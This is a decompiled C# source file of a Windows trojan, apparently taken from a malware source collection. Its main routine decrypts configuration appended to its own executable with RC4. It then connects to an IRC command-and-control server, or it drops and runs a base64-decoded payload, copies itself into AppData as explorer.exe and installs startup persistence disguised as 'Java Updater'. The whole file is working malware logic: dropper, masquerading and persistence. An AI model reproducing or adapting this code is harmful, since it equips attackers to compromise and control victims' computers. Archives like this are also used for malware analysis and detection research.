MalwareSourceCode/MSIL/Trojan/Win32/F/Trojan.Win32.Fsysna.bezr-e553a7902dd2b2c973a97028cc8dc7f1bb82c18b1266abf90d2140ec0b5b3a01/Main.cs

45 lines
1.7 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Refx.Main
// Assembly: Refx, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 5DD4C44F-C748-4813-B398-D3DE520CF41A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Fsysna.bezr-e553a7902dd2b2c973a97028cc8dc7f1bb82c18b1266abf90d2140ec0b5b3a01.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace Refx
{
[StandardModule]
internal sealed class Main
{
private static clsIRC ClsIRC = new clsIRC();
[STAThread]
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public static void Main()
{
string[] strArray = Strings.Split(modRC4.rc4(modEOF.ReadEOFData(ref modEOF.SELF_EXE), "02112011"), "!@!");
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
if (Information.UBound((Array) strArray) <= 4)
return;
if (Operators.CompareString(Strings.UCase(Strings.Right(modEOF.SELF_EXE, 12)), "EXPLORER.EXE", false) == 0)
{
modAuth.OWNER = strArray[5];
Refx.Main.ClsIRC.SetIRCConfig(strArray[1], Conversions.ToInteger(strArray[2]), strArray[3], strArray[4]);
Refx.Main.ClsIRC.StartIRC();
}
else
{
modBase64.DecodeData(strArray[6], "C:\\Run.exe");
Process.Start("C:\\Run.exe");
FileSystem.FileCopy(modEOF.SELF_EXE, folderPath + "\\explorer.exe");
modRegister.StartUpInstall("Java Updater", folderPath + "\\explorer.exe", true);
Process.Start(folderPath + "\\explorer.exe");
}
}
}
}